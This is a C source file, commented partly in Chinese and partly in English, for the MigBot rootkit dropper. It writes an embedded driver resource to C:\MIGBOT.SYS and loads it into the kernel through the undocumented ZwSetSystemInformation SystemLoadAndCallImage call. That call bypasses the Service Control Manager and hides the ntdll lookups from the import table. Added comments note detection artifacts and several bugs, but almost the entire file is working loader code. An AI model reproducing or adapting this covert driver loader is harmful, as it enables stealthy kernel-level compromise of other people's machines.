释放-加载-删除驱动的代码

#pragma comment(linker,"/ENTRY:main")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")

//#pragma comment(lib,"msvcrt.lib")

#if (_MSC_VER < 1300)
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif

#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <stdio.h>

/*
 * Counted (not NUL-terminated) Unicode string as used by the NT native API.
 * Length and MaximumLength are byte counts - the MIDL annotation below divides
 * by 2 to get the number of USHORT elements in Buffer.  Declared here because
 * the file only includes <windows.h>, not the DDK headers.
 */
typedef struct _UNICODE_STRING {
    USHORT Length;          // bytes currently in use
    USHORT MaximumLength;   // bytes available in Buffer
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;

// Native-API status code; negative values are failures (see NT_SUCCESS).
typedef long NTSTATUS;

// Success test for an NTSTATUS: anything non-negative counts as success.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

// Pointer type for ntdll's undocumented ZwSetSystemInformation, resolved at
// run time with GetProcAddress in load_sysfile (it is not imported statically,
// so it does not show up in the executable's import table).
typedef
NTSTATUS
(__stdcall *ZWSETSYSTEMINFORMATION)(
            DWORD SystemInformationClass,
            PVOID SystemInformation,
            ULONG SystemInformationLength
);

// Pointer type for ntdll's RtlInitUnicodeString, also resolved at run time.
typedef
VOID
(__stdcall *RTLINITUNICODESTRING)(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString  
);

// Filled in by load_sysfile; zero-initialised (NULL) until then.
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
RTLINITUNICODESTRING RtlInitUnicodeString;

// Payload for the SystemLoadAndCallImage information class: the NT path of
// the driver image to load.
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

// SystemInformationClass value passed to ZwSetSystemInformation in
// load_sysfile; nothing in this file registers a service, so the driver is
// handed to the kernel without going through the Service Control Manager.
#define SystemLoadAndCallImage 38

// NOTE(review): `bool` is not provided by <windows.h>/<stdio.h> in C (it needs
// <stdbool.h>); this listing was presumably built as C++ - confirm.
bool decompress_sysfile();
bool load_sysfile();
bool cleanup();

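/*
 * Program entry point.  The /ENTRY:main linker pragma at the top of the file
 * makes this the raw PE entry with no CRT start-up; whether printf works
 * without CRT initialisation is not shown here - confirm.
 *
 * Runs the three stages in order: drop the embedded driver, load it, then
 * cleanup (which runs regardless of the earlier outcome).  Returns 0 when
 * every stage reported success and 1 if any stage failed, so the result is
 * visible to a caller instead of being discarded as it was with `void main()`
 * (non-standard in C, which requires main to return int).
 */
int main(void)
{
    int rc = 0;

    if(!decompress_sysfile())
    {
        printf("Failed to decompress m1gB0t\r\n");
        rc = 1;
    }
    else if(!load_sysfile())
    {
        printf("Failed to load m1gB0t\r\n");
        rc = 1;
    }

    // cleanup is attempted even when an earlier stage failed
    if(!cleanup())
    {
        printf("Cleanup failed\r\n");
        rc = 1;
    }

    return rc;
}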

//----------------------------------------------------------------
//在磁盘上生成驱动文件
//----------------------------------------------------------------
/*
 * Write the driver image embedded as resource "MIGBOT" (type "BINARY") to
 * C:\MIGBOT.SYS.  Returns false if the resource cannot be found, loaded or
 * locked, or if the output file cannot be created; returns true otherwise -
 * even when the writes themselves fail (see the loop below).
 *
 * Defender notes: the drop location is a fixed path in the root of C:, the
 * file is created with CREATE_ALWAYS (an existing file is overwritten), and
 * the payload is a named resource inside the dropper's own image - both the
 * resource entry and the on-disk file are straightforward artifacts to look
 * for.
 */
bool decompress_sysfile()
{
    HRSRC aResourceH;             // resource directory entry for "MIGBOT"/"BINARY"
    HGLOBAL aResourceHGlobal;     // loaded resource block
    unsigned char * aFilePtr;     // cursor over the locked resource bytes
    unsigned long aFileSize;      // resource size in bytes; counted down by the write loop
    HANDLE file_handle;           // output file
   
    //////////////////////////////////////////////////////////
    // Find a named resource in the current executable's image
    //////////////////////////////////////////////////////////
    aResourceH = FindResource(NULL, "MIGBOT", "BINARY");
    if(!aResourceH)
    {
        return false;
    }
   
    aResourceHGlobal = LoadResource(NULL, aResourceH);
    if(!aResourceHGlobal)
    {
        return false;
    }

    // NOTE(review): a zero SizeofResource result is not rejected; the loop
    // below then writes nothing and the function still returns true.
    aFileSize = SizeofResource(NULL, aResourceH);
    aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);
    if(!aFilePtr)
    {
        return false;
    }

    // FILE_ALL_ACCESS requests every file right although only write access
    // is used; CREATE_ALWAYS replaces any file already at the path.
    file_handle =
        CreateFile(
                "C:\\MIGBOT.SYS",
                FILE_ALL_ACCESS,
                0,
                NULL,
                CREATE_ALWAYS,
                0,
                NULL);

    if(INVALID_HANDLE_VALUE == file_handle)
    {
        return false;
    }

    // One WriteFile call per byte.  NOTE(review): the BOOL result and
    // numWritten are never checked, so a failed or short write goes
    // unnoticed and the function reports success over a truncated file.
    while(aFileSize--)
    {
        unsigned long numWritten;
        WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);
        aFilePtr++;
    }
    CloseHandle(file_handle);   // result ignored

    return true;
}

//----------------------------------------------------------------
// 用非正规方法加载驱动
//----------------------------------------------------------------
/*
 * Load C:\MIGBOT.SYS into the kernel through the undocumented
 * ZwSetSystemInformation(SystemLoadAndCallImage) call rather than the
 * Service Control Manager.  Returns false if either ntdll export cannot be
 * resolved or the call returns a failing NTSTATUS; true otherwise.
 *
 * Defender notes: no service or driver registry entry is created here - the
 * image is handed to ntdll by its NT path - and both ntdll functions are
 * looked up at run time, so neither appears in the dropper's import table.
 * NOTE(review): this information class is reported to have been removed or
 * rejected on later Windows builds; treat the technique as historical and
 * confirm behaviour on the build in question.
 */
bool load_sysfile()
{
    SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;   // request block for ZwSetSystemInformation

    // NT object-manager path ("\??\" prefix) of the file decompress_sysfile wrote.
    WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";

    //////////////////////////////////////////////////////////////
    // get DLL entry points
    //////////////////////////////////////////////////////////////
    // NOTE(review): GetModuleHandle's result goes to GetProcAddress unchecked;
    // ntdll.dll is mapped in every user-mode process so it is unlikely to be
    // NULL, but a failure would surface only as a NULL function pointer.
    if(    !(RtlInitUnicodeString = (RTLINITUNICODESTRING)
            GetProcAddress( GetModuleHandle("ntdll.dll")
            ,"RtlInitUnicodeString"
            )))
    {
        return false;
    }

    if(!(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)   
                GetProcAddress(
                    GetModuleHandle("ntdll.dll")
                    ,"ZwSetSystemInformation" )))
    {
        return false;
    }

    // RtlInitUnicodeString stores a pointer to daPath (a stack array) rather
    // than a copy, so GregsImage is only valid while this frame is live; the
    // call that consumes it is made below, inside the same frame.
    RtlInitUnicodeString(
        &(GregsImage.ModuleName)
        ,daPath
    );

    // Class 38 (SystemLoadAndCallImage - per its name, load the image and call
    // its entry point); a negative NTSTATUS is reported to the caller as failure.
    if(
        !NT_SUCCESS(
            ZwSetSystemInformation(
                SystemLoadAndCallImage
                ,&GregsImage
                ,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
    {
        return false;
    }

    return true;
}

//----------------------------------------------------------------
// 删除驱动
//----------------------------------------------------------------
/*
 * Remove the dropped driver file from disk.
 *
 * The deletion is compiled in only when _delete_sysfile is defined, and
 * nothing in this listing defines it, so as shown the function is a no-op
 * that returns true and C:\MIGBOT.SYS is left behind - an on-disk artifact
 * worth checking for.  NOTE(review): the guarded test is inverted: DeleteFile
 * returns a BOOL that is nonzero on success and S_OK is 0, so with the macro
 * defined this would report failure exactly when the delete succeeded; the
 * intended check is DeleteFile's own BOOL result.
 */
bool cleanup()
{
   
#ifdef _delete_sysfile
    if(S_OK != DeleteFile("C:\\MIGBOT.SYS"))
    {
        return false;
    }
#endif

    return true;
}
